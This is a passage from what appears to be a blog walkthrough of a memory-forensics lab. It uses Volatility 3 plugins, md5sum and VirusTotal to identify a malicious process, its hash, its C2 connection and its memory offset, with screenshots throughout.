</code></code></pre><ol start="2"><li><p>Observe the parent-child relationship and note the process ID (PID) of the child process spawned.</p></li></ol><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!fQf-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F577c8d1d-81d8-4e38-9887-780c7cab2227_1064x45.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!fQf-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F577c8d1d-81d8-4e38-9887-780c7cab2227_1064x45.png 424w, https://substackcdn.com/image/fetch/$s_!fQf-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F577c8d1d-81d8-4e38-9887-780c7cab2227_1064x45.png 848w, https://substackcdn.com/image/fetch/$s_!fQf-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F577c8d1d-81d8-4e38-9887-780c7cab2227_1064x45.png 1272w, https://substackcdn.com/image/fetch/$s_!fQf-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F577c8d1d-81d8-4e38-9887-780c7cab2227_1064x45.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!fQf-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F577c8d1d-81d8-4e38-9887-780c7cab2227_1064x45.png" width="1064" height="45" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/577c8d1d-81d8-4e38-9887-780c7cab2227_1064x45.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:45,&quot;width&quot;:1064,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:25377,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!fQf-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F577c8d1d-81d8-4e38-9887-780c7cab2227_1064x45.png 424w, https://substackcdn.com/image/fetch/$s_!fQf-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F577c8d1d-81d8-4e38-9887-780c7cab2227_1064x45.png 848w, https://substackcdn.com/image/fetch/$s_!fQf-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F577c8d1d-81d8-4e38-9887-780c7cab2227_1064x45.png 1272w, https://substackcdn.com/image/fetch/$s_!fQf-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F577c8d1d-81d8-4e38-9887-780c7cab2227_1064x45.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p></p><div><hr></div><h2><strong>Task 3: Find the MD5 Hash of the Malicious File</strong></h2><p><strong>Steps:</strong></p><ol><li><p>Dump the memory region of the malicious process:</p></li></ol><pre><code><code>~/.local/bin/vol -f &lt;memory-file&gt; windows.dumpfiles --pid &lt;malicious-pid&gt; -o .
</code></code></pre><ol start="2"><li><p>Use <code>md5sum</code> to calculate the hash:</p></li></ol><pre><code><code>md5sum &lt;dumped-file&gt;
</code></code></pre><div><hr></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!cnEB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ace66ae-c777-4242-90fd-8b6190802f51_1142x666.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!cnEB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ace66ae-c777-4242-90fd-8b6190802f51_1142x666.png 424w, https://substackcdn.com/image/fetch/$s_!cnEB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ace66ae-c777-4242-90fd-8b6190802f51_1142x666.png 848w, https://substackcdn.com/image/fetch/$s_!cnEB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ace66ae-c777-4242-90fd-8b6190802f51_1142x666.png 1272w, https://substackcdn.com/image/fetch/$s_!cnEB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ace66ae-c777-4242-90fd-8b6190802f51_1142x666.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!cnEB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ace66ae-c777-4242-90fd-8b6190802f51_1142x666.png" width="1142" height="666" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8ace66ae-c777-4242-90fd-8b6190802f51_1142x666.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:666,&quot;width&quot;:1142,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:331003,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!cnEB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ace66ae-c777-4242-90fd-8b6190802f51_1142x666.png 424w, https://substackcdn.com/image/fetch/$s_!cnEB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ace66ae-c777-4242-90fd-8b6190802f51_1142x666.png 848w, https://substackcdn.com/image/fetch/$s_!cnEB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ace66ae-c777-4242-90fd-8b6190802f51_1142x666.png 1272w, https://substackcdn.com/image/fetch/$s_!cnEB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ace66ae-c777-4242-90fd-8b6190802f51_1142x666.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!xLoW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49f2fa9d-3354-4df7-8f1e-84950e942e95_1139x201.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!xLoW!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49f2fa9d-3354-4df7-8f1e-84950e942e95_1139x201.png 424w, https://substackcdn.com/image/fetch/$s_!xLoW!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49f2fa9d-3354-4df7-8f1e-84950e942e95_1139x201.png 848w, https://substackcdn.com/image/fetch/$s_!xLoW!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49f2fa9d-3354-4df7-8f1e-84950e942e95_1139x201.png 1272w, https://substackcdn.com/image/fetch/$s_!xLoW!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49f2fa9d-3354-4df7-8f1e-84950e942e95_1139x201.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!xLoW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49f2fa9d-3354-4df7-8f1e-84950e942e95_1139x201.png" width="1139" height="201" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/49f2fa9d-3354-4df7-8f1e-84950e942e95_1139x201.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:201,&quot;width&quot;:1139,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:128523,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!xLoW!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49f2fa9d-3354-4df7-8f1e-84950e942e95_1139x201.png 424w, https://substackcdn.com/image/fetch/$s_!xLoW!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49f2fa9d-3354-4df7-8f1e-84950e942e95_1139x201.png 848w, https://substackcdn.com/image/fetch/$s_!xLoW!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49f2fa9d-3354-4df7-8f1e-84950e942e95_1139x201.png 1272w, https://substackcdn.com/image/fetch/$s_!xLoW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49f2fa9d-3354-4df7-8f1e-84950e942e95_1139x201.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!6v3E!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c913547-53f9-4912-99bc-38a0d0af4bc3_1001x211.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!6v3E!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c913547-53f9-4912-99bc-38a0d0af4bc3_1001x211.png 424w, https://substackcdn.com/image/fetch/$s_!6v3E!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c913547-53f9-4912-99bc-38a0d0af4bc3_1001x211.png 848w, https://substackcdn.com/image/fetch/$s_!6v3E!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c913547-53f9-4912-99bc-38a0d0af4bc3_1001x211.png 1272w, https://substackcdn.com/image/fetch/$s_!6v3E!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c913547-53f9-4912-99bc-38a0d0af4bc3_1001x211.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!6v3E!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c913547-53f9-4912-99bc-38a0d0af4bc3_1001x211.png" width="1001" height="211" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9c913547-53f9-4912-99bc-38a0d0af4bc3_1001x211.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:211,&quot;width&quot;:1001,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:52577,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!6v3E!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c913547-53f9-4912-99bc-38a0d0af4bc3_1001x211.png 424w, https://substackcdn.com/image/fetch/$s_!6v3E!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c913547-53f9-4912-99bc-38a0d0af4bc3_1001x211.png 848w, https://substackcdn.com/image/fetch/$s_!6v3E!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c913547-53f9-4912-99bc-38a0d0af4bc3_1001x211.png 1272w, https://substackcdn.com/image/fetch/$s_!6v3E!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9c913547-53f9-4912-99bc-38a0d0af4bc3_1001x211.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p></p><h2><strong>Task 4: Confirm the C2 IP Address and Port</strong></h2><p><strong>Steps:</strong></p><ol><li><p>Run the <strong>windows.netscan</strong> plugin to check for active connections:</p></li></ol><pre><code><code>~/.local/bin/vol -f &lt;memory-file&gt; windows.netscan
</code></code></pre><ol start="2"><li><p>Look for the malicious PID and note the foreign address and port.</p></li></ol><p></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!DIbk!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4a8bb90-04b2-4fe8-aa56-43849e219af3_1153x81.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!DIbk!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4a8bb90-04b2-4fe8-aa56-43849e219af3_1153x81.png 424w, https://substackcdn.com/image/fetch/$s_!DIbk!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4a8bb90-04b2-4fe8-aa56-43849e219af3_1153x81.png 848w, https://substackcdn.com/image/fetch/$s_!DIbk!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4a8bb90-04b2-4fe8-aa56-43849e219af3_1153x81.png 1272w, https://substackcdn.com/image/fetch/$s_!DIbk!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4a8bb90-04b2-4fe8-aa56-43849e219af3_1153x81.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!DIbk!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4a8bb90-04b2-4fe8-aa56-43849e219af3_1153x81.png" width="1153" height="81" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f4a8bb90-04b2-4fe8-aa56-43849e219af3_1153x81.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:81,&quot;width&quot;:1153,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:31200,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!DIbk!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4a8bb90-04b2-4fe8-aa56-43849e219af3_1153x81.png 424w, https://substackcdn.com/image/fetch/$s_!DIbk!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4a8bb90-04b2-4fe8-aa56-43849e219af3_1153x81.png 848w, https://substackcdn.com/image/fetch/$s_!DIbk!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4a8bb90-04b2-4fe8-aa56-43849e219af3_1153x81.png 1272w, https://substackcdn.com/image/fetch/$s_!DIbk!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff4a8bb90-04b2-4fe8-aa56-43849e219af3_1153x81.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p></p><div><hr></div><h2><strong>Task 5: Confirm the Execution Time and C2 Channel Establishment Time</strong></h2><p><strong>Steps:</strong></p><ol><li><p>Use the <strong>windows.netscan</strong> plugin output.</p></li><li><p>Review the timestamp associated with the connection established by the malicious process.</p></li></ol><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!im-q!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbaf6a434-ad77-43ac-9e6c-58179949a808_1157x69.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!im-q!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbaf6a434-ad77-43ac-9e6c-58179949a808_1157x69.png 424w, https://substackcdn.com/image/fetch/$s_!im-q!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbaf6a434-ad77-43ac-9e6c-58179949a808_1157x69.png 848w, https://substackcdn.com/image/fetch/$s_!im-q!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbaf6a434-ad77-43ac-9e6c-58179949a808_1157x69.png 1272w, https://substackcdn.com/image/fetch/$s_!im-q!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbaf6a434-ad77-43ac-9e6c-58179949a808_1157x69.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!im-q!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbaf6a434-ad77-43ac-9e6c-58179949a808_1157x69.png" width="1157" height="69" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/baf6a434-ad77-43ac-9e6c-58179949a808_1157x69.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:69,&quot;width&quot;:1157,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:32438,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!im-q!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbaf6a434-ad77-43ac-9e6c-58179949a808_1157x69.png 424w, https://substackcdn.com/image/fetch/$s_!im-q!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbaf6a434-ad77-43ac-9e6c-58179949a808_1157x69.png 848w, https://substackcdn.com/image/fetch/$s_!im-q!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbaf6a434-ad77-43ac-9e6c-58179949a808_1157x69.png 1272w, https://substackcdn.com/image/fetch/$s_!im-q!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbaf6a434-ad77-43ac-9e6c-58179949a808_1157x69.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p></p><div><hr></div><h2><strong>Task 6: Find the Memory Offset of the Malicious Process</strong></h2><p><strong>Steps:</strong></p><ol><li><p>Run the <strong>windows.psscan</strong> plugin:</p></li></ol><pre><code><code>~/.local/bin/vol -f &lt;memory-file&gt; windows.psscan
</code></code></pre><ol start="2"><li><p>Locate the malicious process PID and note its memory offset.</p></li></ol><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!zlRb!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c2f1fcf-6261-4183-ab6e-013796a41029_1050x211.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!zlRb!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c2f1fcf-6261-4183-ab6e-013796a41029_1050x211.png 424w, https://substackcdn.com/image/fetch/$s_!zlRb!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c2f1fcf-6261-4183-ab6e-013796a41029_1050x211.png 848w, https://substackcdn.com/image/fetch/$s_!zlRb!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c2f1fcf-6261-4183-ab6e-013796a41029_1050x211.png 1272w, https://substackcdn.com/image/fetch/$s_!zlRb!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c2f1fcf-6261-4183-ab6e-013796a41029_1050x211.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!zlRb!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c2f1fcf-6261-4183-ab6e-013796a41029_1050x211.png" width="1050" height="211" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4c2f1fcf-6261-4183-ab6e-013796a41029_1050x211.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:211,&quot;width&quot;:1050,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:83596,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!zlRb!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c2f1fcf-6261-4183-ab6e-013796a41029_1050x211.png 424w, https://substackcdn.com/image/fetch/$s_!zlRb!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c2f1fcf-6261-4183-ab6e-013796a41029_1050x211.png 848w, https://substackcdn.com/image/fetch/$s_!zlRb!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c2f1fcf-6261-4183-ab6e-013796a41029_1050x211.png 1272w, https://substackcdn.com/image/fetch/$s_!zlRb!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c2f1fcf-6261-4183-ab6e-013796a41029_1050x211.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p></p><div><hr></div><h2><strong>Task 7: Determine When the Malicious File Was First Submitted to VirusTotal</strong></h2><p><strong>Steps:</strong></p><ol><li><p>Copy the MD5 hash from Task 3.</p></li><li><p>Open <strong>VirusTotal</strong> (</p></li></ol><p>https://www.virustotal.com</p><ol start="3"><li><p>) and paste the MD5 hash in the search bar.</p></li><li><p>Review the "First Submission" date and time.</p></li></ol><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!WtvM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbe912bd-f941-482a-8495-bf202dbf6661_2078x733.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" 